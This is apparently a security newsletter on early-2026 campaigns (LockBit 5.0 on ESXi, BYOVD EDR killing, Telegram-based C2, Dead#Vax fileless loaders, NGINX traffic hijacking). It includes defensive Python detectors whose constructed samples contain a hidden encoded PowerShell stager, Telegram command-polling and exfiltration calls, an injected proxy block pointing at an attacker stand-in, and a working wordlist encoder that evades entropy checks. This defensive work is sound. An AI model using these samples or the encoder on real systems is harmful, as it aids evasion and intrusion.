TRENDING TOPICS FEB 05, 2026

Update: LockBit 5.0 Emerges as Cross-Platform Ransomware Targeting Windows, Linux, and ESXi Environments

Kaspersky has identified a new wave of LockBit 5.0 ransomware samples built to run on Windows, Linux, and VMware ESXi, continuing the shift toward scalable, multi-platform ransomware operations. Analysis of 19 payloads shows a shared core paired with platform-specific logic for interacting with files, processes, and system utilities on each operating system. The latest builds replace the group's earlier AES-based file encryption with the faster ChaCha20 stream cipher, which speeds up encryption of large data sets and avoids the well-known cryptographic library calls that detection signatures look for. At the time of analysis, at least one sample had a very low detection rate, pointing to recent development or effective evasion. The findings also fit broader reporting that LockBit is moving toward a cartel-style structure, sharing infrastructure, affiliates, and operational playbooks with other ransomware groups, a model that increases scale, resilience, and campaign tempo across multiple sectors.

Technical analysis of the ESXi variant shows the group's continued focus on hypervisors as high-impact targets. The ransomware first checks that it is running on an ESXi host, enumerates the running virtual machines, and forcibly powers them off (a running VM holds locks on its disk files, so they must be stopped before the files can be overwritten) before starting a multi-threaded encryption routine against virtual disk and configuration files. Encryption runs in two stages: a fast partial pass first, then full encryption, so an entire virtual estate can be disrupted within a short execution window. Command-line flags give operators granular control over encryption percentage, execution timing, logging, and VM exclusions, reflecting a mature affiliate-driven deployment model. Anti-analysis checks for debugging tools, combined with self-deletion routines, are designed to hinder investigation and incident response.

This focus on hypervisor-level attacks reinforces a broader trend in ransomware operations: by targeting the virtualization layer, adversaries can disrupt dozens or hundreds of enterprise systems in a single attack.

SonicWall VPN Intrusion Leads to Kernel-Level EDR Disruption via Revoked Driver Abuse

Security researchers at Huntress responded to a February 2026 intrusion in which threat actors gained initial access with compromised SonicWall SSLVPN credentials, then pivoted quickly into internal reconnaissance and defense evasion. Authentication logs showed a denied portal login from one IP followed almost immediately by a successful VPN client connection from another, consistent with credential testing followed by rapid access establishment. Once inside, the attacker ran aggressive network discovery, including ICMP sweeps, NetBIOS probes, and high-rate SMB SYN scanning, to map reachable systems. The intrusion followed a familiar ransomware precursor pattern of credentialed access, lateral reconnaissance, and preparation to disable security controls. Analysts disrupted the activity before any ransomware was deployed, but the timeline reflects a structured attack chain built to blind defenses ahead of follow-on impact.

The attacker deployed a 64-bit EDR killer using a bring-your-own-vulnerable-driver (BYOVD) technique, abusing a legitimate but revoked EnCase forensic driver to terminate security processes from kernel mode. The malware carried the driver encoded with a wordlist-based substitution scheme, so the embedded payload reads as benign text and slips past static and entropy-based detection. Once decoded and loaded, the driver exposed IOCTL handlers that let the user-mode component terminate processes belonging to major EDR and AV vendors, bypassing user-mode tamper protections entirely. The driver's signing certificate was issued before Microsoft's July 2015 driver-signing cutoff and the signature was timestamped while the certificate was still valid, so Windows still loads it even though the certificate has been expired and revoked for more than a decade: kernel-mode code integrity honors the grandfathered cross-signature and does not perform revocation checks at load time. This case highlights a growing trend in which ransomware operators rely on legitimate but vulnerable drivers to disable defenses before encryption or data exfiltration.

Defenders should enable hypervisor-protected code integrity (HVCI, shown in Windows Security as Memory Integrity), deploy Microsoft's vulnerable driver blocklist (enforced through Windows Defender Application Control), and turn on the attack surface reduction rule that blocks abuse of exploited vulnerable signed drivers, so that known-abused drivers cannot load in the first place.
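The reason a wordlist encoding defeats entropy checks is easy to show, and so is a cheap triage heuristic for it. The block below is an added example for this page: it is not the malware's encoder or Huntress's decoder, and the 256-word vocabulary is a hypothetical stand-in, since the actual wordlist is not described here. It encodes a constructed fake driver (an MZ header plus pseudo-random bytes), compares entropy before and after, and then flags the encoded text without knowing the vocabulary, using the fact that byte-substituted code is a long stream drawn evenly from a closed set of at most 256 tokens, whereas prose has an open vocabulary with a steep frequency curve.

```python
import math
import random
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: packed or encrypted code sits near 8, prose near 4 to 5."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

# Hypothetical 256-word vocabulary, one word per byte value. The wordlist the real
# malware used is not on the page; this one only reproduces the effect.
_BASE = ["alpha", "bravo", "charlie", "delta", "echo", "foxtrot", "golf", "hotel", "india",
         "juliet", "kilo", "lima", "mike", "november", "oscar", "papa", "quebec", "romeo",
         "sierra", "tango", "uniform", "victor", "whiskey", "xray", "yankee", "zulu"]
VOCAB = [_BASE[i % 26] + str(i // 26) for i in range(256)]  # alpha0 ... zulu9, all distinct
random.Random(7).shuffle(VOCAB)
BYTE_TO_WORD = dict(enumerate(VOCAB))
WORD_TO_BYTE = {w: b for b, w in BYTE_TO_WORD.items()}

def encode_as_words(blob: bytes) -> str:
    """Substitute each byte with its word; the result reads as harmless low-entropy text."""
    return " ".join(BYTE_TO_WORD[b] for b in blob)

def decode_words(text: str) -> bytes:
    """Inverse substitution; KeyError on any token outside the vocabulary."""
    return bytes(WORD_TO_BYTE[tok] for tok in text.split())

def looks_like_word_encoded_binary(text: str, max_vocab=256, min_ratio=8, top_share=0.3) -> bool:
    """Triage heuristic that needs no knowledge of the wordlist: a long token stream drawn from a
    small closed vocabulary whose most common 10% of tokens carry an unnaturally small share of
    the text. Repetitive boilerplate can also trip it, so confirm a hit by decoding."""
    tokens = text.split()
    counts = Counter(tokens)
    if not tokens or len(counts) > max_vocab or len(tokens) < min_ratio * len(counts):
        return False
    top = sorted(counts.values(), reverse=True)[: max(1, len(counts) // 10)]
    return sum(top) / len(tokens) < top_share

# Constructed stand-in for a driver: PE 'MZ' magic followed by pseudo-random bytes (not a real driver).
_rng = random.Random(1)
FAKE_DRIVER = b"MZ" + bytes(_rng.getrandbits(8) for _ in range(4094))
ENCODED = encode_as_words(FAKE_DRIVER)
PROSE = ("Please find attached the quarterly report for review; let me know if any of the "
         "figures need clarification before the board meeting next week.")

if __name__ == "__main__":
    print(f"raw entropy     : {shannon_entropy(FAKE_DRIVER):.2f} bits/byte")
    print(f"encoded entropy : {shannon_entropy(ENCODED.encode()):.2f} bits/byte")
    print("flagged:", looks_like_word_encoded_binary(ENCODED),
          "| decoded starts with MZ:", decode_words(ENCODED).startswith(b"MZ"))
```

The encoded text's character entropy cannot exceed about 5.2 bits (letters, digits and spaces), so any entropy threshold tuned for packed PE files will pass it. The statistical check is only a filter; the confirming step on a suspect blob is to recover the mapping (for example from the loader's own decode routine) and check for a PE header, then submit the driver's hash against Microsoft's vulnerable driver blocklist.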

Update: Prince of Persia Activity Tied to Iranian Internet Blackout and Telegram-Based C2 Operations

SafeBreach researchers have uncovered new activity from the Iranian state-linked Prince of Persia threat actor, including infrastructure changes, a new Tornado malware variant, and a likely counter-attack against the researchers themselves. Between December 2025 and early February 2026, the group replaced all previously identified command-and-control servers, modified server-side logging to obscure victim identities, and switched its infection vector to a recent WinRAR vulnerability to improve compromise rates. Researchers also gained access to more than 2,000 exfiltrated files and historical Telegram-based C2 communications, revealing sustained espionage activity since early 2025. The actor showed operational awareness by deleting communication logs, altering backend code, and introducing RSA-verified log structures that let the backend reject spoofed victim submissions. Activity stopped abruptly on January 8, coinciding with a nationwide Iranian internet blackout, and resumed just before connectivity was restored, strengthening the assessment of direct state alignment.

Technical analysis also identified Tornado v51, which uses dual command-and-control channels over HTTP and Telegram and a hybrid domain-generation approach that combines custom algorithms with blockchain-derived data. The malware is delivered through archive exploitation, persists through scheduled tasks, and contacts its C2 servers to exfiltrate system information or download secondary payloads. Researchers also observed a likely strike-back attempt in which the actor sent a malicious ZIP file disguised as exfiltrated data, delivering ZZ Stealer and a modified StormKitty infostealer.

Similarities between this tooling and earlier campaigns against open-source ecosystems suggest shared tradecraft or resource overlap with other Iranian-aligned threat clusters, including possible links to Educated Manticore and activity historically associated with APT33. The group's use of Telegram for command delivery, data exfiltration, and infrastructure coordination shows continued reliance on legitimate platforms to blend into normal traffic. Defenders should monitor for unusual Telegram traffic and restrict unauthorized Telegram use in enterprise environments, watch for suspicious archive execution and scheduled-task or startup-folder persistence, block known indicators tied to the group's infrastructure, and apply timely OS and application patches, including for recent archive-handling and Windows vulnerabilities.
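"Unusual Telegram traffic" is easier to pin down than it sounds: the Telegram desktop and mobile clients talk MTProto to Telegram's data centers, while malware that uses Telegram as C2 almost always calls the HTTPS Bot API at api.telegram.org/bot<token>/<method>, which ordinary users never touch. The following is an added example for this page (not SafeBreach's detection logic, and not derived from Tornado's code) that pulls Bot API calls out of constructed web-proxy log lines, groups them by bot token, and alerts when one token is shared by several hosts or when the methods used look like command polling and exfiltration. The bot token format (numeric ID, colon, 35-character secret) is an assumption based on publicly documented tokens.

```python
import re
from collections import defaultdict

# Constructed proxy log lines in the form: client_ip "user-agent" url (not from the report).
SAMPLE_PROXY_LOG = """\
10.0.1.15 "Mozilla/5.0 (Windows NT 10.0) Chrome/121" https://web.telegram.org/a/
10.0.1.22 "python-requests/2.31" https://api.telegram.org/bot7201938475:AAHkQzX9v8Lm2NpRtYw4sDfGhJkL0pQeRtu/getUpdates?offset=1
10.0.1.23 "python-requests/2.31" https://api.telegram.org/bot7201938475:AAHkQzX9v8Lm2NpRtYw4sDfGhJkL0pQeRtu/sendDocument
10.0.1.40 "Mozilla/5.0 (Windows NT 10.0) Chrome/121" https://api.telegram.org/bot7201938475:AAHkQzX9v8Lm2NpRtYw4sDfGhJkL0pQeRtu/getUpdates
10.0.1.51 "curl/8.4" https://api.telegram.org/bot5512345678:AAEabcdefghijklmnopqrstuvwxyz012345/getMe
"""

LINE_RE = re.compile(r'^(?P<ip>\S+)\s+"(?P<ua>[^"]*)"\s+(?P<url>\S+)$')
# Assumed token shape: <bot id>:<35 chars of [A-Za-z0-9_-]>
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{35})/(?P<method>\w+)"
)
# Bot API methods that map onto C2 behaviour: poll for operator commands, push data or files out.
C2_METHODS = {"getUpdates": "command polling", "sendDocument": "file exfiltration",
              "sendMessage": "beacon or text exfiltration"}

def find_bot_api_use(text):
    """Group every Bot API call by bot ID: which hosts used it, which methods, which user agents.
    The secret part of the token is deliberately not stored, only the numeric bot ID."""
    bots = defaultdict(lambda: {"hosts": set(), "methods": set(), "agents": set()})
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        b = BOT_API_RE.search(m.group("url"))
        if not b:
            continue  # web.telegram.org or other traffic is not Bot API use
        rec = bots[b.group("bot_id")]
        rec["hosts"].add(m.group("ip"))
        rec["methods"].add(b.group("method"))
        rec["agents"].add(m.group("ua"))
    return bots

def triage(bots, min_hosts=2):
    """Return findings for bots that look like shared C2 rather than a single developer's test."""
    findings = []
    for bot_id, rec in bots.items():
        reasons = []
        if len(rec["hosts"]) >= min_hosts:
            reasons.append(f"same bot token used from {len(rec['hosts'])} hosts")
        c2 = sorted(m for m in rec["methods"] if m in C2_METHODS)
        if c2:
            reasons.append("C2-style methods: " + ", ".join(f"{m} ({C2_METHODS[m]})" for m in c2))
        if reasons:
            findings.append({"bot_id": bot_id, "hosts": sorted(rec["hosts"]),
                             "agents": sorted(rec["agents"]), "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in triage(find_bot_api_use(SAMPLE_PROXY_LOG)):
        print(f"bot {f['bot_id']} on {f['hosts']} via {f['agents']}: " + "; ".join(f["reasons"]))
```

A single host calling getMe from curl (the last sample line) is left alone, since that is what a developer testing a bot looks like; the same token polling getUpdates from three workstations, one of them claiming to be a browser, is the pattern worth an incident ticket. If TLS inspection is not available, the DNS and SNI for api.telegram.org from hosts that have no business running bots is the fallback signal.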

Dead#Vax Campaign Exploits VHD Containers and Fileless Script Chains for In-Memory RAT Deployment

Security researchers at Securonix have identified a multi-stage malware campaign, dubbed Dead#Vax, that leverages trusted file formats, heavy script obfuscation, and fileless execution to evade traditional endpoint defenses. The chain begins with phishing emails delivering IPFS-hosted VHD files posing as business documents; the files inside a mounted disk image do not inherit the Mark-of-the-Web carried by the downloaded image itself, so the contents run without the usual warnings once the image is mounted. Execution progresses through Windows Script Files, heavily obfuscated self-parsing batch scripts, and layered PowerShell loaders that decrypt each stage only at runtime. The final stage injects encrypted x64 shellcode into trusted, Microsoft-signed Windows processes, so the implant never touches disk in a recognizable form. Analysis confirmed the payload is a fully functional AsyncRAT implant capable of long-term surveillance and remote control. Organizations should restrict disk image formats such as VHD and ISO from untrusted sources, enforce email and web controls on container-based downloads, and educate users about the risks of mounting unsolicited disk images.

From a tradecraft perspective, Dead#Vax is deliberately designed for stealth, stability, and reinfection control through memory-only execution and runtime deobfuscation. The loaders use multi-layer string encryption, native Win32 API calls through embedded C#, and marker-based memory scanning to avoid duplicate injections and reduce behavioral noise. By abusing legitimate Windows processes for execution and persistence, the campaign blends malicious activity into normal system behavior and complicates forensic reconstruction. The reliance on process injection, scheduled-task persistence, and encrypted shellcode reflects a broader shift toward detection-resistant, script-centric malware frameworks rather than novel binaries.

Defenders should prioritize PowerShell script block logging, monitor for injection-related Win32 API usage, deploy memory-level detection and hunting capabilities, and correlate multi-stage execution behavior rather than relying on single indicators.
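None of the individual steps in the Dead#Vax chain is rare on its own (wscript.exe runs scripts, cmd.exe runs batch files, PowerShell gets launched with -enc by plenty of admin tooling), which is why the last recommendation above matters. The block below is an added example, not Securonix's detection content, showing one way to do that correlation: it walks the parent chain of every PowerShell process in a set of constructed Sysmon-style process-creation events, scores each weak indicator along the chain, and alerts only on the sum. The assumption that the system drive is C: (so a script launched from D: through Z: may be coming from a mounted image) and the indicator weights are choices made for this example.

```python
import re
from collections import namedtuple

ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Constructed process-creation events (Sysmon Event ID 1 style); not from the Securonix report.
# The base64 in the -enc argument is truncated filler, not a real payload.
EVENTS = [
    ProcEvent(1000, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(2000, 1000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "E:\Invoice_2026_Q1.wsf"'),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\jdoe\AppData\Local\Temp\~st1.bat"'),
    ProcEvent(2200, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent(3000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(4000, 1000, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(4100, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -c Get-Date"),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_FILE = re.compile(r"[\w~.-]+\.(wsf|js|jse|vbs|vbe)\b", re.I)
BATCH_FILE = re.compile(r"\.(bat|cmd)\b", re.I)
NON_SYSTEM_DRIVE = re.compile(r'["\s]([D-Z]):\\', re.I)  # assumption: system drive is C:

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestry(events, pid):
    """Chain from the process itself up to its oldest known ancestor (cycle-safe)."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain

def score_chain(chain):
    """Add points for each weak indicator on the process and its ancestors; return (score, reasons)."""
    reasons = []
    leaf = chain[0]
    if basename(leaf.image) == "powershell.exe":
        cl = leaf.cmdline.lower()
        for flag, why in (("-enc", "encoded command"), ("-w hidden", "hidden window"),
                          ("-nop", "profile suppressed")):
            if flag in cl:
                reasons.append((1, why))
    for anc in chain[1:]:
        name = basename(anc.image)
        if name in SCRIPT_HOSTS and SCRIPT_FILE.search(anc.cmdline):
            reasons.append((2, f"ancestor {name} ran a script file"))
            if NON_SYSTEM_DRIVE.search(anc.cmdline):
                reasons.append((1, "script launched from a non-system drive (possible mounted VHD/ISO)"))
        if name == "cmd.exe" and BATCH_FILE.search(anc.cmdline):
            reasons.append((1, "ancestor cmd.exe ran a batch file"))
    return sum(p for p, _ in reasons), reasons

def find_suspicious_chains(events, threshold=4):
    """Alert on every powershell.exe whose ancestry accumulates enough weak indicators."""
    alerts = []
    for e in events:
        if basename(e.image) != "powershell.exe":
            continue
        chain = ancestry(events, e.pid)
        score, reasons = score_chain(chain)
        if score >= threshold:
            alerts.append({"pid": e.pid, "score": score,
                           "chain": [basename(x.image) for x in reversed(chain)],
                           "reasons": [why for _, why in reasons]})
    return alerts

if __name__ == "__main__":
    for a in find_suspicious_chains(EVENTS):
        print(f"pid {a['pid']} score {a['score']}: {' -> '.join(a['chain'])}")
        for r in a["reasons"]:
            print("   -", r)
```

With the sample events, the backup script (pid 3000) scores zero and the interactive Get-Date (pid 4100) scores one, while the VHD-delivered chain scores seven, so the threshold has room on both sides. Feed it real Sysmon or EDR telemetry keyed on ProcessId/ParentProcessId and add the mount event for the VHD (Event ID 1 for explorer mounting, or the VHD driver's own log) as one more weighted indicator.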

NGINX Traffic Hijacking Campaign Targets Baota Panels and Asian TLD Infrastructure

Datadog has identified an active web traffic hijacking campaign against compromised NGINX servers and Baota (BT) management panels, primarily affecting sites under Asian top-level domains and government or educational sites. The attackers modify legitimate NGINX configuration files by injecting location blocks that intercept matching inbound requests and proxy them through attacker-controlled backend servers. Because the blocks use ordinary directives such as rewrite, proxy_pass, and proxy_set_header, and preserve the original request metadata, the redirected traffic looks legitimate and is hard to distinguish from normal reverse proxying. Targeting patterns show a focus on domains under TLDs including [.]in, [.]id, [.]pe, [.]bd, and [.]th, as well as [.]edu and [.]gov sites. The activity has been linked to actors previously associated with React2Shell exploitation, suggesting continued post-exploitation monetization or surveillance.

The campaign uses a multi-stage automated toolkit to deploy and maintain the malicious configurations. Initial scripts act as orchestrators that download further payloads; later stages enumerate common NGINX configuration directories or Baota panel paths and inject domain-specific hijacking rules. The more advanced scripts implement error handling, validate the modified configuration with nginx -t, and perform controlled reloads to avoid service disruption, indicating mature operational tradecraft. A final stage scans the compromised system, builds a map of hijacked domains and their proxy targets, and exfiltrates the results to an external command-and-control server. Because persistence relies on configuration abuse rather than an exploitable flaw in NGINX itself, the hijack can go unnoticed while the affected sites keep working normally. Defenders should put file integrity monitoring on NGINX configuration directories, restrict write access to trusted administrators, and audit proxy directives to detect and remove unauthorized traffic redirection.
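The audit recommended above can be scripted: every proxy_pass in a location block should point at a named upstream, a loopback or unix socket, or a backend on an approved list, and any rewrite that sends clients to an absolute external URL deserves a look. The following is an added example for this page (not Datadog's tooling or the attackers' scripts) with a deliberately small line-based parser and a constructed config excerpt containing one legitimate app proxy and one injected block of the kind the campaign plants. Run it over the output of nginx -T so include files are expanded; the parser assumes one directive or brace per line, which is how nginx -T prints and how the injected blocks are written.

```python
import re
from urllib.parse import urlparse

# Constructed nginx.conf excerpt: a normal app proxy plus an injected hijack block.
# 203.0.113.45 is documentation address space, standing in for an attacker backend.
SAMPLE_CONF = r"""
upstream app_backend {
    server 127.0.0.1:8080;
}

server {
    listen 80;
    server_name portal.example.in;

    location /api/ {
        proxy_pass http://app_backend;
        proxy_set_header Host $host;
    }

    # injected block
    location ~* ^/(news|download)/ {
        proxy_pass http://203.0.113.45:8089;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        rewrite ^/download/(.*)$ /files/$1 break;
    }

    location / {
        root /var/www/html;
    }
}
"""

LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"}

def parse_locations(conf):
    """Return (upstream names, [(location header, [(directive, args)])]).
    Minimal brace tracking; comments stripped; one directive or brace per line assumed."""
    upstreams, locations, stack = set(), [], []
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.endswith("{"):
            header = line[:-1].strip()
            if header.startswith("upstream "):
                upstreams.add(header.split()[1])
            stack.append((header, []))
            continue
        if line == "}":
            header, directives = stack.pop()
            if header.startswith("location "):
                locations.append((header, directives))
            continue
        directive, _, args = line.rstrip(";").partition(" ")
        if stack:
            stack[-1][1].append((directive, args.strip()))
    return upstreams, locations

def proxy_target_host(args, upstreams):
    """Host part of a proxy_pass target; None for named upstreams and unix sockets."""
    if args.startswith("unix:"):
        return None
    host = urlparse(args).hostname or args
    return None if host in upstreams else host

def audit(conf, allowed_hosts=frozenset()):
    """Flag location blocks whose proxy_pass leaves the box for an unapproved host,
    and rewrites that redirect to an absolute external URL."""
    upstreams, locations = parse_locations(conf)
    findings = []
    for header, directives in locations:
        for directive, args in directives:
            if directive == "proxy_pass":
                host = proxy_target_host(args, upstreams)
                if host and host not in LOCAL_HOSTS and host not in allowed_hosts:
                    findings.append((header, f"proxy_pass to unrecognized host {host}"))
            elif directive == "rewrite" and re.search(r"(^|\s)https?://", args):
                findings.append((header, f"rewrite to external URL: {args}"))
    return findings

if __name__ == "__main__":
    for header, problem in audit(SAMPLE_CONF):
        print(f"[{header}] {problem}")
```

Pair the script with a file-integrity baseline: the campaign's own scripts run nginx -t and a graceful reload, so the hijack produces no errors or downtime, and the configuration diff is the only artifact. Backends you do proxy to externally go in allowed_hosts so the audit stays quiet on them.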

Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.